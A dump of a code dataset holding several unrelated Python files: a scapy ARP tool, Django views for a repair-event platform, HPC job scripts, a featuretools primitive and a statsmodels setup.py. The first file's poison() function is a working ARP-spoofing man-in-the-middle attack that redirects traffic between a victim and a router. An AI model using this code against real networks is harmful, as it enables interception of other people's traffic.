index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
18,700 | 34f331f00941881a5466c7a99e51febad8bc9aa0 | #!/usr/bin/env python
import sh
import re
import argh
import time
import signal
import logging
import itertools
from scapy.all import *
import utils
def _arp_registered_MAC(ip, interface=Ether):
return srp(ARP(pdst=ip), timeout=5, retry=3)[0][1][interface].src
def _load_mac_table():
pattern = re.compile(r' \((\d+\.\d+\.\d+.\d+)\) at ([0-9a-f:]{17}) \[[\w]+\] on (\w+)')
results = {}
for line in sh.arp('-a'):
match = pattern.search(line)
if not match:
continue
ip, mac, interface = match.group(1), match.group(2), match.group(3)
if interface not in results:
results[interface] = list()
results[interface].append((ip, mac))
return results
def poison(routerIP, victimIP, attackerIP, interface='eth0'):
routerMAC = _arp_registered_MAC(routerIP)
victimMAC = _arp_registered_MAC(victimIP)
attackerMAC = _arp_registered_MAC(attackerIP)
if not routerMAC or not victimMAC or not attackerMAC:
logging.error('''Could not determine all parties MACs:\n
\t router IP: {rip} \t MAC: {rmac} \n
\t victim IP: {vip} \t MAC: {vmac} \n
\t attacker IP: {aip} \t MAC: {amac} \n
'''.format(rip=routerIP, rmac=routerMAC,
vip=victimIP, vmac=victimMAC,
aip=attackerIP, amac=attackerMAC))
return
def _signal_handler(signal, frame):
send(ARP(op=2, pdst=victimIP, psrc=routerIP, hwdst=victimMAC, hwsrc=routerMAC))
send(ARP(op=2, pdst=routerIP, psrc=victimIP, hwdst=routerMAC, hwsrc=victimMAC))
with utils.ip_forwarding():
signal.signal(signal.SIGINT, _signal_handler)
while True:
send(ARP(op=2, pdst=routerIP, psrc=victimIP, hwdst=attackerMAC, hwsrc=victimMAC), count=3)
send(ARP(op=2, pdst=victimIP, psrc=routerIP, hwdst=attackerMAC, hwsrc=routerMAC), count=3)
time.sleep(2)
def monitor(interface=None):
try:
table = dict(itertools.chain(*_load_mac_table().values()))
except:
table = {}
def fn(packet):
if not packet[ARP].op == 2:
return
ip, mac = packet[ARP].psrc, packet[ARP].hwsrc
msg = "Response: \t %s \t has address \t %s" % (ip, mac)
if table.get(ip):
if table[ip] != mac:
logging.warn('%s \t > Differ from current arp table' % msg)
print '%s > %s' % (ip, mac)
else:
logging.info('%s \t > Already on arp table' % msg)
else:
logging.info('%s \t > New to arp table' % msg)
table[ip] = mac
sniff_fn = sniff if not interface else functools.partial(sniff, iface=interface)
sniff_fn(filter='arp', prn=fn, store=0)
def display(interface=None):
for iface, entries in _load_mac_table().items():
if interface and iface != interface:
continue
print 'Interface %s (%i items)' % (iface, len(entries))
for ip, mac in sorted(entries):
print '\t %s \t %s' % (ip, mac)
print
def flush(ip=None, interface=None):
if not ip:
table = _load_mac_table()
entries = table.get(interface, []) if interface else itertools.chain(*table.values())
else:
entries = [(ip, None)]
for ip, _ in entries:
sh.arp('-d', ip)
logging.info('Flushed %s' % ip)
if __name__ == '__main__':
utils.assure_root()
utils.config_graceful_exit()
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
argh.dispatch_commands([poison, flush, monitor, display])
|
18,701 | a7746f00dff50550818a97465ffa8bcbb063aa0e | #encoding: UTF-8
#Blanca Flor Caldern Vazquez
#vectores
from Graphics import*
from math import*
#Con esta función convertiremos radianes a grados
def convertirRadianesAGrados(rad):
grados=(rad*180)/3.1416
return grados
def main():
magnitud=int(input("ingresa la magnitud"))
angulo=int(input("ingresa el ángulo"))
anguloG=convertirRadianesAGrados(angulo)
v=Window("Top-Down",800,800)
t=Arrow((0,400),90)
t.penDown()
t.draw(v)
t.forward(800)
t.penUp()
t.rotate(180)
t.forward(400)
t.rotate(90)
t.penDown()
t.forward(400)
t.rotate(180)
t.forward(800)
t.penUp()
t.rotate(90)
t.penDown()
t.rotate(anguloG)
t.forward(magnitud)
main()
|
18,702 | a3df5ede027d59fcfc95019c939dbc04a27e9f15 | import numpy as np
from woodwork.column_schema import ColumnSchema
from woodwork.logical_types import Boolean, BooleanNullable, IntegerNullable
from featuretools.primitives.base.aggregation_primitive_base import AggregationPrimitive
from featuretools.utils.gen_utils import Library, import_or_none
dd = import_or_none("dask.dataframe")
class NumTrue(AggregationPrimitive):
"""Counts the number of `True` values.
Description:
Given a list of booleans, return the number
of `True` values. Ignores 'NaN'.
Examples:
>>> num_true = NumTrue()
>>> num_true([True, False, True, True, None])
3
"""
name = "num_true"
input_types = [
[ColumnSchema(logical_type=Boolean)],
[ColumnSchema(logical_type=BooleanNullable)],
]
return_type = ColumnSchema(logical_type=IntegerNullable, semantic_tags={"numeric"})
default_value = 0
stack_on = []
stack_on_exclude = []
compatibility = [Library.PANDAS, Library.DASK]
description_template = "the number of times {} is true"
def get_function(self, agg_type=Library.PANDAS):
if agg_type == Library.DASK:
def chunk(s):
chunk_sum = s.agg(np.sum)
if chunk_sum.dtype == "bool":
chunk_sum = chunk_sum.astype("int64")
return chunk_sum
def agg(s):
return s.agg(np.sum)
return dd.Aggregation(self.name, chunk=chunk, agg=agg)
return np.sum
|
18,703 | 4ef75d1e7be011187a6ec409e4d7681b26a825b1 | #!/usr/bin/env python
from __future__ import print_function, division
from collections import defaultdict, OrderedDict
import warnings
import concurrent.futures
import gzip
import pickle
import json
import time
import numexpr
import os
from optparse import OptionParser
import uproot, uproot_methods
import numpy as np
from coffea import hist
parser = OptionParser()
parser.add_option('-d', '--dataset', help='dataset', dest='dataset', default='')
parser.add_option('-e', '--exclude', help='exclude', dest='exclude', default='')
parser.add_option('-p', '--processor', help='processor', dest='processor', default='')
parser.add_option('-m', '--metadata', help='metadata', dest='metadata', default='')
parser.add_option('-c', '--cluster', help='cluster', dest='cluster', default='lpc')
parser.add_option('-t', '--tar', action='store_true', dest='tar')
parser.add_option('-x', '--copy', action='store_true', dest='copy')
(options, args) = parser.parse_args()
os.system('mkdir -p hists/'+options.processor+'/run_condor/out hists/'+options.processor+'/run_condor/err hists/'+options.processor+'/run_condor/log')
if options.tar:
os.system('tar --exclude-caches-all --exclude-vcs -czvf ../../decaf.tgz --exclude=\'analysis/hists/*/*____*\' --exclude=\'analysis/hists/*/*condor/*/*\' ../../decaf')
os.system('tar --exclude-caches-all --exclude-vcs -czvf ../../pylocal.tgz -C ~/.local/lib/python3.6/ site-packages')
if options.cluster == 'kisti':
if options.copy:
os.system('xrdfs root://cms-xrdr.private.lo:2094/ rm /xrd/store/user/'+os.environ['USER']+'/decaf.tgz')
print('decaf removed')
os.system('xrdcp -f ../../decaf.tgz root://cms-xrdr.private.lo:2094//xrd/store/user/'+os.environ['USER']+'/decaf.tgz')
os.system('xrdfs root://cms-xrdr.private.lo:2094/ rm /xrd/store/user/'+os.environ['USER']+'/pylocal.tgz')
print('pylocal removed')
os.system('xrdcp -f ../../pylocal.tgz root://cms-xrdr.private.lo:2094//xrd/store/user/'+os.environ['USER']+'/pylocal.tgz')
jdl = """universe = vanilla
Executable = run.sh
Should_Transfer_Files = YES
WhenToTransferOutput = ON_EXIT
Transfer_Input_Files = run.sh, /tmp/x509up_u556950957
Output = hists/$ENV(PROCESSOR)/run_condor/out/$ENV(SAMPLE)_$(Cluster)_$(Process).stdout
Error = hists/$ENV(PROCESSOR)/run_condor/err/$ENV(SAMPLE)_$(Cluster)_$(Process).stderr
Log = hists/$ENV(PROCESSOR)/run_condor/log/$ENV(SAMPLE)_$(Cluster)_$(Process).log
TransferOutputRemaps = "$ENV(PROCESSOR)_$ENV(SAMPLE).futures=$ENV(PWD)/hists/$ENV(PROCESSOR)/$ENV(SAMPLE).futures"
Arguments = $ENV(METADATA) $ENV(SAMPLE) $ENV(PROCESSOR) $ENV(CLUSTER) $ENV(USER)
accounting_group=group_cms
JobBatchName = $ENV(BTCN)
request_cpus = 8
request_memory = 7000
Queue 1"""
if options.cluster == 'lpc':
if options.copy:
os.system('xrdcp -f ../../decaf.tgz root://cmseos.fnal.gov//store/user/'+os.environ['USER']+'/decaf.tgz')
os.system('xrdcp -f ../../pylocal.tgz root://cmseos.fnal.gov//store/user/'+os.environ['USER']+'/pylocal.tgz')
jdl = """universe = vanilla
Executable = run.sh
Should_Transfer_Files = YES
WhenToTransferOutput = ON_EXIT
Transfer_Input_Files = run.sh
Output = hists/$ENV(PROCESSOR)/run_condor/out/$ENV(SAMPLE)_$(Cluster)_$(Process).stdout
Error = hists/$ENV(PROCESSOR)/run_condor/err/$ENV(SAMPLE)_$(Cluster)_$(Process).stderr
Log = hists/$ENV(PROCESSOR)/run_condor/log/$ENV(SAMPLE)_$(Cluster)_$(Process).log
TransferOutputRemaps = "$ENV(PROCESSOR)_$ENV(SAMPLE).futures=$ENV(PWD)/hists/$ENV(PROCESSOR)/$ENV(SAMPLE).futures"
Arguments = $ENV(METADATA) $ENV(SAMPLE) $ENV(PROCESSOR) $ENV(CLUSTER) $ENV(USER)
request_cpus = 8
request_memory = 5700
Queue 1"""
jdl_file = open("run.submit", "w")
jdl_file.write(jdl)
jdl_file.close()
with open('metadata/'+options.metadata+'.json') as fin:
datadef = json.load(fin)
for dataset, info in datadef.items():
if options.dataset and options.dataset not in dataset: continue
if options.exclude and options.exclude in dataset: continue
os.system('rm -rf hists/'+options.processor+'/run_condor/err/'+dataset+'*')
os.system('rm -rf hists/'+options.processor+'/run_condor/log/'+dataset+'*')
os.system('rm -rf hists/'+options.processor+'/run_condor/out/'+dataset+'*')
os.environ['SAMPLE'] = dataset
os.environ['BTCN'] = dataset.split('____')[0]
os.environ['PROCESSOR'] = options.processor
os.environ['METADATA'] = options.metadata
os.environ['CLUSTER'] = options.cluster
os.system('condor_submit run.submit')
os.system('rm run.submit')
|
18,704 | e116bf6be28f8f7dda737466ae70d3a12a0b3d6b | #!/usr/bin/env python3
# Author: Francois Aguet
import pandas as pd
import argparse
import os
parser = argparse.ArgumentParser(description='Combine covariates into a single matrix')
parser.add_argument('genotype_pcs', help='')
parser.add_argument('expression_covariates', help='')
parser.add_argument('prefix', help='')
parser.add_argument('--add_covariates', default=[], nargs='+', help='')
parser.add_argument('-o', '--output_dir', default='.', help='Output directory')
args = parser.parse_args()
#print('Combining covariates ... ', end='', flush=True)
expression_df = pd.read_csv(args.expression_covariates, sep='\t', index_col=0, dtype=str)
genotype_df = pd.read_csv(args.genotype_pcs, sep='\t', index_col=0, dtype=str)
combined_df = pd.concat([genotype_df[expression_df.columns], expression_df], axis=0)
for c in args.add_covariates:
additional_df = pd.read_csv(c, sep='\t', index_col=0, dtype=str)
combined_df = pd.concat([combined_df, additional_df[expression_df.columns]], axis=0)
combined_df.to_csv(os.path.join(args.output_dir, args.prefix+'.combined_covariates.txt'), sep='\t')#, float_format='%.6g')
print('done.')
|
18,705 | 08c00415290331e645b06750daecde591f3ea37b | from dbf_rw import dbfreader
from pprint import pprint
from bz2 import BZ2File
ENCODING_DBF = 'cp1252'
arq_dbf = BZ2File('BR_Localidades_2010_v1.dbf.bz2')
localidades = dbfreader(arq_dbf)
nomes = []
tipos = []
for i, loc in enumerate(localidades):
if i == 0:
nomes = loc
elif i == 1:
tipos = loc
else:
break
pprint(zip(nomes, tipos))
|
18,706 | f7d70483a676cbfbf5f98ef7f1c97d8a50ee2e29 | from dal import autocomplete
from django.shortcuts import get_object_or_404
from django.db.models import Q
from django.utils.safestring import mark_safe
from django.views.generic import (
TemplateView,
DetailView,
ListView,
FormView,
)
import django_tables2 as tables
from django_filters.views import FilterView
from django_tables2.views import SingleTableMixin
from django_tables2.export.views import ExportMixin
from openrepairplatform.tables import FeeTable, MemberTable, EventTable
from openrepairplatform.filters import FeeFilter, MemberFilter, EventFilter
from openrepairplatform.user.mixins import PermissionOrgaContextMixin
from openrepairplatform.mixins import HasActivePermissionMixin
from openrepairplatform.user.models import (
CustomUser,
Organization,
Fee
)
from openrepairplatform.event.models import Event, Activity, Place
from openrepairplatform.user.forms import (
CustomUserEmailForm,
CustomUserSearchForm,
MoreInfoCustomUserForm,
)
from openrepairplatform.event.forms import (
EventSearchForm
)
from django.db.models import Count
from datetime import datetime
EVENTS_PER_PAGE = 6
class HomeView(TemplateView, FormView):
form_class = EventSearchForm
template_name = "home.html"
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context["search_form"] = EventSearchForm(self.request.GET)
context["event_count"] = Event.objects.all().count()
context["user_count"] = CustomUser.objects.all().count()
context["organization_count"] = Organization.objects.all().count()
context["results_number"] = self.get_queryset().count()
return context
def get_queryset(self):
queryset = Event.future_published_events()
form = EventSearchForm(self.request.GET)
if not form.is_valid():
return queryset
if form.cleaned_data["place"]:
queryset = queryset.filter(location=form.cleaned_data["place"])
if form.cleaned_data["organization"]:
queryset = queryset.filter(
organization=form.cleaned_data["organization"]
)
if form.cleaned_data["activity"]:
queryset = queryset.filter(activity=form.cleaned_data["activity"])
if form.cleaned_data["starts_before"]:
queryset = queryset.filter(
date__lte=form.cleaned_data["starts_before"]
)
if form.cleaned_data["starts_after"]:
queryset = queryset.filter(
date__gte=form.cleaned_data["starts_after"]
)
return queryset
class OrganizationPageView(PermissionOrgaContextMixin, DetailView):
model = Organization
template_name = "organization_page.html"
def get_object(self, *args, **kwargs):
self.organization = Organization.objects.get(
slug=self.kwargs["orga_slug"]
)
return self.organization
def get_context_data(self, *args, **kwargs):
context = super().get_context_data(*args, **kwargs)
activities = Activity.objects.filter(organization=self.organization).annotate(category_count=Count('category')
).order_by('-category_count')
context ["activities_list"] = activities.order_by('category__name')
context["future_event"] = Event.future_published_events().filter(
organization=self.organization).order_by('date')
context["page_tab"] = 'active'
context["organization_menu"] = 'active'
return context
class OrganizationEventsView(
PermissionOrgaContextMixin,
ExportMixin,
tables.SingleTableMixin,
FilterView,
):
model = Organization
template_name = "organization_events.html"
context_object_name = "events"
table_class = EventTable
filterset_class = EventFilter
paginate_by = 20
dataset_kwargs = {"title": "Event"}
form_class = EventSearchForm
def get_queryset(self):
orga_slug = self.kwargs.get("orga_slug")
organization = get_object_or_404(Organization, slug=orga_slug)
self.object = organization
return organization.events.order_by("-date")
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
organization = Organization.objects.get(slug=self.kwargs.get("orga_slug"))
context["events_tab"] = 'active'
context["organization_menu"] = 'active'
context["organization"] = organization
context["search_form"] = self.form_class
filtered_data = EventFilter(self.request.GET, queryset=self.get_queryset().all())
context["total_events"] = filtered_data.qs.count()
context["today"] = datetime.date(datetime.now())
context["future_event"] = Event.future_published_events().filter(
organization=organization).order_by('date')
return context
class OrganizationGroupsView(PermissionOrgaContextMixin, DetailView):
model = Organization
template_name = "organization_groups.html"
def get_object(self, *args, **kwargs):
self.organization = Organization.objects.get(
slug=self.kwargs["orga_slug"]
)
return self.organization
def get_context_data(self, *args, **kwargs):
context = super().get_context_data(*args, **kwargs)
context["emails"] = [
(f"{user.email} ({user.first_name} {user.last_name})", user.email)
for user in CustomUser.objects.all()
]
context["add_admin_form"] = CustomUserEmailForm(auto_id="id_admin_%s")
context["add_active_form"] = CustomUserEmailForm(
auto_id="id_active_%s"
)
context["add_volunteer_form"] = CustomUserEmailForm(
auto_id="id_volunteer_%s"
)
context["add_member_form"] = MoreInfoCustomUserForm
context["groups_tab"] = 'active'
context["organization_menu"] = 'active'
context["future_event"] = Event.future_published_events().filter(
organization=self.organization).order_by('date')
return context
class OrganizationMembersView(
HasActivePermissionMixin,
PermissionOrgaContextMixin,
ExportMixin,
tables.SingleTableMixin,
FilterView
):
model = CustomUser
template_name = "organization_members.html"
context_object_name = "members"
paginate_by = 20
table_class = MemberTable
filterset_class = MemberFilter
paginate_by = 40
dataset_kwargs = {"title": "Members"}
def get_queryset(self):
self.object = self.organization
queryset = self.organization.members.all().order_by("last_name")
return queryset
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context["members_tab"] = 'active'
context["organization_menu"] = 'active'
context["organization"] = self.organization
context["search_form"] = CustomUserSearchForm
context["emails"] = [
(f"{user.email} ({user.first_name} {user.last_name})", user.email)
for user in CustomUser.objects.all()
]
context["add_member_form"] = MoreInfoCustomUserForm
context["future_event"] = Event.future_published_events().filter(
organization=self.organization).order_by('date')
return context
class OrganizationFeesView(
HasActivePermissionMixin,
PermissionOrgaContextMixin,
ExportMixin,
tables.SingleTableMixin,
FilterView
):
model = Fee
template_name = "organization_fees.html"
context_object_name = "fees"
table_class = FeeTable
filterset_class = FeeFilter
paginate_by = 40
dataset_kwargs = {"title": "Fees"}
def get_queryset(self):
self.object = self.organization
return self.model.objects.filter(
organization=self.organization
).order_by("-date").exclude(amount=0)
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context["accounting_tab"] = 'active'
context["organization_menu"] = 'active'
context["organization"] = self.organization
filtered_data = FeeFilter(self.request.GET, queryset=self.get_queryset().all())
context["total_fees"] = sum(
[fee.amount for fee in filtered_data.qs]
)
context["future_event"] = Event.future_published_events().filter(
organization=self.organization).order_by('date')
return context
class OrganizationControlsView(
HasActivePermissionMixin, PermissionOrgaContextMixin, DetailView
):
model = Organization
template_name = "organization_controls.html"
def get_object(self, *args, **kwargs):
return self.model.objects.get(slug=self.organization.slug)
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context["controls_tab"] = 'active'
context["organization_menu"] = 'active'
context["future_event"] = Event.future_published_events().filter(
organization=self.organization).order_by('date')
return context
class OrganizationDetailsView(PermissionOrgaContextMixin, DetailView):
model = Organization
template_name = "organization_details.html"
def get_object(self, *args, **kwargs):
return Organization.objects.get(slug=self.kwargs["orga_slug"])
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context["organization"] = self.object
context["organization_menu"] = 'active'
return context
#### autocomplete ####
class ActiveOrgaAutocomplete(HasActivePermissionMixin, autocomplete.Select2QuerySetView):
def get_queryset(self, *args, **kwargs):
orga_slug = self.kwargs.get("orga_slug")
organization = get_object_or_404(Organization, slug=orga_slug)
if not self.request.user.is_authenticated:
return CustomUser.objects.none()
qs = organization.actives.all().union(
organization.admins.all(), organization.volunteers.all()
)
if self.q:
qs = qs.filter(Q(first_name__icontains=self.q) | Q(last_name__icontains=self.q))
return qs
class CustomUserAutocomplete(autocomplete.Select2QuerySetView):
def get_queryset(self):
if not self.request.user.is_authenticated:
return CustomUser.objects.none()
qs = CustomUser.objects.all()
if self.q:
qs = qs.filter(Q(first_name__icontains=self.q) | Q(last_name__icontains=self.q) | Q(email__icontains=self.q))
return qs
def get_selected_result_label(self, item):
return f"<span class='selected-user' id={item.pk}/>{item}</span>"
class PlaceAutocomplete(autocomplete.Select2QuerySetView):
def get_queryset(self):
if not self.request.user.is_authenticated:
return Place.objects.none()
qs = Place.objects.all().order_by("name")
if self.q:
qs = qs.filter(Q(name__icontains=self.q) | Q(address__icontains=self.q))
return qs
class ActivityAutocomplete(autocomplete.Select2QuerySetView):
def get_queryset(self):
if not self.request.user.is_authenticated:
return Activity.objects.none()
future_events = Event.future_published_events()
qs = Activity.objects.all().order_by("name")
if self.q:
qs = qs.filter(name__icontains=self.q)
return qs
|
18,707 | 19f66d9d63561df23f5f8469208c035be4b4e17a | """
To build with coverage of Cython files
export SM_CYTHON_COVERAGE=1
python -m pip install -e .
pytest --cov=statsmodels statsmodels
coverage html
"""
from setuptools import Command, Extension, find_packages, setup
from setuptools.dist import Distribution
from collections import defaultdict
import fnmatch
import inspect
import os
from os.path import dirname, join as pjoin, relpath
from pathlib import Path
import shutil
import sys
SETUP_DIR = Path(__file__).parent.resolve()
try:
# SM_FORCE_C is a testing shim to force setup to use C source files
FORCE_C = int(os.environ.get("SM_FORCE_C", 0))
if FORCE_C:
raise ImportError("Force import error for testing")
from Cython import Tempita
from Cython.Build import cythonize
from Cython.Distutils import build_ext
HAS_CYTHON = True
except ImportError:
from setuptools.command.build_ext import build_ext
HAS_CYTHON = False
try:
import numpy # noqa: F401
HAS_NUMPY = True
except ImportError:
HAS_NUMPY = False
###############################################################################
# Key Values that Change Each Release
###############################################################################
# These are strictly installation requirements. Builds requirements are
# managed in pyproject.toml
INSTALL_REQUIRES = []
with open("requirements.txt", encoding="utf-8") as req:
for line in req.readlines():
INSTALL_REQUIRES.append(line.split("#")[0].strip())
DEVELOP_REQUIRES = []
with open("requirements-dev.txt", encoding="utf-8") as req:
for line in req.readlines():
DEVELOP_REQUIRES.append(line.split("#")[0].strip())
CYTHON_MIN_VER = "0.29.26" # released 2020
EXTRAS_REQUIRE = {
"build": ["cython>=" + CYTHON_MIN_VER],
"develop": ["cython>=" + CYTHON_MIN_VER] + DEVELOP_REQUIRES,
"docs": [
"sphinx",
"nbconvert",
"jupyter_client",
"ipykernel",
"matplotlib",
"nbformat",
"numpydoc",
"pandas-datareader",
],
}
###############################################################################
# Values that rarely change
###############################################################################
DISTNAME = "statsmodels"
DESCRIPTION = "Statistical computations and models for Python"
README = SETUP_DIR.joinpath("README.rst").read_text()
LONG_DESCRIPTION = README
MAINTAINER = "statsmodels Developers"
MAINTAINER_EMAIL = "pystatsmodels@googlegroups.com"
URL = "https://www.statsmodels.org/"
LICENSE = "BSD License"
DOWNLOAD_URL = ""
PROJECT_URLS = {
"Bug Tracker": "https://github.com/statsmodels/statsmodels/issues",
"Documentation": "https://www.statsmodels.org/stable/index.html",
"Source Code": "https://github.com/statsmodels/statsmodels",
}
CLASSIFIERS = [
"Development Status :: 4 - Beta",
"Environment :: Console",
"Programming Language :: Cython",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Operating System :: OS Independent",
"Intended Audience :: End Users/Desktop",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"Natural Language :: English",
"License :: OSI Approved :: BSD License",
"Topic :: Office/Business :: Financial",
"Topic :: Scientific/Engineering",
]
FILES_TO_INCLUDE_IN_PACKAGE = ["LICENSE.txt", "setup.cfg"]
FILES_COPIED_TO_PACKAGE = []
for filename in FILES_TO_INCLUDE_IN_PACKAGE:
if os.path.exists(filename):
dest = os.path.join("statsmodels", filename)
shutil.copy2(filename, dest)
FILES_COPIED_TO_PACKAGE.append(dest)
STATESPACE_RESULTS = "statsmodels.tsa.statespace.tests.results"
ADDITIONAL_PACKAGE_DATA = {
"statsmodels": FILES_TO_INCLUDE_IN_PACKAGE,
"statsmodels.datasets.tests": ["*.zip"],
"statsmodels.iolib.tests.results": ["*.dta"],
"statsmodels.stats.tests.results": ["*.json"],
"statsmodels.tsa.stl.tests.results": ["*.csv"],
"statsmodels.tsa.vector_ar.tests.results": ["*.npz", "*.dat"],
"statsmodels.stats.tests": ["*.txt"],
"statsmodels.stats.libqsturng": ["*.r", "*.txt", "*.dat"],
"statsmodels.stats.libqsturng.tests": ["*.csv", "*.dat"],
"statsmodels.sandbox.regression.tests": ["*.dta", "*.csv"],
STATESPACE_RESULTS: ["*.pkl", "*.csv"],
STATESPACE_RESULTS + ".frbny_nowcast": ["test*.mat"],
STATESPACE_RESULTS + ".frbny_nowcast.Nowcasting.data.US": ["*.csv"],
}
##############################################################################
# Extension Building
##############################################################################
CYTHON_COVERAGE = os.environ.get("SM_CYTHON_COVERAGE", False)
CYTHON_COVERAGE = CYTHON_COVERAGE in ("1", "true", '"true"')
CYTHON_TRACE_NOGIL = str(int(CYTHON_COVERAGE))
if CYTHON_COVERAGE:
print("Building with coverage for Cython code")
COMPILER_DIRECTIVES = {"linetrace": CYTHON_COVERAGE}
DEFINE_MACROS = [
("CYTHON_TRACE_NOGIL", CYTHON_TRACE_NOGIL),
("NPY_NO_DEPRECATED_API", "NPY_1_7_API_VERSION"),
]
exts = dict(
_stl={"source": "statsmodels/tsa/stl/_stl.pyx"},
_exponential_smoothers={
"source": "statsmodels/tsa/holtwinters/_exponential_smoothers.pyx"
}, # noqa: E501
_ets_smooth={
"source": "statsmodels/tsa/exponential_smoothing/_ets_smooth.pyx"
}, # noqa: E501
_innovations={"source": "statsmodels/tsa/_innovations.pyx"},
_hamilton_filter={
"source": "statsmodels/tsa/regime_switching/_hamilton_filter.pyx.in"
}, # noqa: E501
_kim_smoother={
"source": "statsmodels/tsa/regime_switching/_kim_smoother.pyx.in"
}, # noqa: E501
_arma_innovations={
"source": "statsmodels/tsa/innovations/_arma_innovations.pyx.in"
}, # noqa: E501
linbin={"source": "statsmodels/nonparametric/linbin.pyx"},
_qn={"source": "statsmodels/robust/_qn.pyx"},
_smoothers_lowess={
"source": "statsmodels/nonparametric/_smoothers_lowess.pyx"
}, # noqa: E501
)
statespace_exts = [
"statsmodels/tsa/statespace/_initialization.pyx.in",
"statsmodels/tsa/statespace/_representation.pyx.in",
"statsmodels/tsa/statespace/_kalman_filter.pyx.in",
"statsmodels/tsa/statespace/_filters/_conventional.pyx.in",
"statsmodels/tsa/statespace/_filters/_inversions.pyx.in",
"statsmodels/tsa/statespace/_filters/_univariate.pyx.in",
"statsmodels/tsa/statespace/_filters/_univariate_diffuse.pyx.in",
"statsmodels/tsa/statespace/_kalman_smoother.pyx.in",
"statsmodels/tsa/statespace/_smoothers/_alternative.pyx.in",
"statsmodels/tsa/statespace/_smoothers/_classical.pyx.in",
"statsmodels/tsa/statespace/_smoothers/_conventional.pyx.in",
"statsmodels/tsa/statespace/_smoothers/_univariate.pyx.in",
"statsmodels/tsa/statespace/_smoothers/_univariate_diffuse.pyx.in",
"statsmodels/tsa/statespace/_simulation_smoother.pyx.in",
"statsmodels/tsa/statespace/_cfa_simulation_smoother.pyx.in",
"statsmodels/tsa/statespace/_tools.pyx.in",
]
class CleanCommand(Command):
user_options = []
def initialize_options(self) -> None:
pass
def finalize_options(self) -> None:
pass
def run(self) -> None:
msg = """
python setup.py clean is not supported.
Use one of:
* `git clean -xdf` to clean all untracked files
* `git clean -Xdf` to clean untracked files ignored by .gitignore
"""
print(msg)
sys.exit(1)
def update_extension(extension, requires_math=True):
import numpy as np
numpy_includes = [np.get_include()]
extra_incl = pjoin(dirname(inspect.getfile(np.core)), "include")
numpy_includes += [extra_incl]
numpy_includes = list(set(numpy_includes))
numpy_math_libs = {
"include_dirs": [np.get_include()],
"library_dirs": [os.path.join(np.get_include(), '..', 'lib')],
"libraries": ["npymath"]
}
if not hasattr(extension, "include_dirs"):
return
extension.include_dirs = list(set(extension.include_dirs + numpy_includes))
if requires_math:
extension.include_dirs += numpy_math_libs["include_dirs"]
extension.libraries += numpy_math_libs["libraries"]
extension.library_dirs += numpy_math_libs["library_dirs"]
class DeferredBuildExt(build_ext):
"""build_ext command for use when numpy headers are needed."""
def build_extensions(self):
self._update_extensions()
build_ext.build_extensions(self)
def _update_extensions(self):
for extension in self.extensions:
requires_math = extension.name in EXT_REQUIRES_NUMPY_MATH_LIBS
update_extension(extension, requires_math=requires_math)
cmdclass = {"clean": CleanCommand}
if not HAS_NUMPY:
cmdclass["build_ext"] = DeferredBuildExt
def check_source(source_name):
"""Chooses C or pyx source files, and raises if C is needed but missing"""
source_ext = ".pyx"
if not HAS_CYTHON:
source_name = source_name.replace(".pyx.in", ".c")
source_name = source_name.replace(".pyx", ".c")
source_ext = ".c"
if not os.path.exists(source_name):
msg = (
"C source not found. You must have Cython installed to "
"build if the C source files have not been generated."
)
raise IOError(msg)
return source_name, source_ext
def process_tempita(source_name):
"""Runs pyx.in files through tempita is needed"""
if source_name.endswith("pyx.in"):
with open(source_name, "r", encoding="utf-8") as templated:
pyx_template = templated.read()
pyx = Tempita.sub(pyx_template)
pyx_filename = source_name[:-3]
with open(pyx_filename, "w", encoding="utf-8") as pyx_file:
pyx_file.write(pyx)
file_stats = os.stat(source_name)
try:
os.utime(
pyx_filename,
ns=(file_stats.st_atime_ns, file_stats.st_mtime_ns),
)
except AttributeError:
os.utime(pyx_filename, (file_stats.st_atime, file_stats.st_mtime))
source_name = pyx_filename
return source_name
EXT_REQUIRES_NUMPY_MATH_LIBS = []
extensions = []
for config in exts.values():
uses_blas = True
source, ext = check_source(config["source"])
source = process_tempita(source)
name = source.replace("/", ".").replace(ext, "")
include_dirs = config.get("include_dirs", [])
depends = config.get("depends", [])
libraries = config.get("libraries", [])
library_dirs = config.get("library_dirs", [])
uses_numpy_libraries = config.get("numpy_libraries", False)
if uses_blas or uses_numpy_libraries:
EXT_REQUIRES_NUMPY_MATH_LIBS.append(name)
ext = Extension(
name,
[source],
include_dirs=include_dirs,
depends=depends,
libraries=libraries,
library_dirs=library_dirs,
define_macros=DEFINE_MACROS,
)
extensions.append(ext)
for source in statespace_exts:
source, ext = check_source(source)
source = process_tempita(source)
name = source.replace("/", ".").replace(ext, "")
EXT_REQUIRES_NUMPY_MATH_LIBS.append(name)
ext = Extension(
name,
[source],
include_dirs=["statsmodels/src"],
depends=[],
libraries=[],
library_dirs=[],
define_macros=DEFINE_MACROS,
)
extensions.append(ext)
if HAS_NUMPY:
for extension in extensions:
requires_math = extension.name in EXT_REQUIRES_NUMPY_MATH_LIBS
update_extension(extension, requires_math=requires_math)
if HAS_CYTHON:
extensions = cythonize(
extensions,
compiler_directives=COMPILER_DIRECTIVES,
language_level=3,
force=CYTHON_COVERAGE,
)
##############################################################################
# Construct package data
##############################################################################
package_data = defaultdict(list)
filetypes = ["*.csv", "*.txt", "*.dta"]
for root, _, filenames in os.walk(
pjoin(os.getcwd(), "statsmodels", "datasets")
): # noqa: E501
matches = []
for filetype in filetypes:
for filename in fnmatch.filter(filenames, filetype):
matches.append(filename)
if matches:
package_data[".".join(relpath(root).split(os.path.sep))] = filetypes
for root, _, _ in os.walk(pjoin(os.getcwd(), "statsmodels")):
if root.endswith("results"):
package_data[".".join(relpath(root).split(os.path.sep))] = filetypes
for path, filetypes in ADDITIONAL_PACKAGE_DATA.items():
package_data[path].extend(filetypes)
if os.path.exists("MANIFEST"):
os.unlink("MANIFEST")
class BinaryDistribution(Distribution):
def is_pure(self):
return False
setup(
name=DISTNAME,
maintainer=MAINTAINER,
ext_modules=extensions,
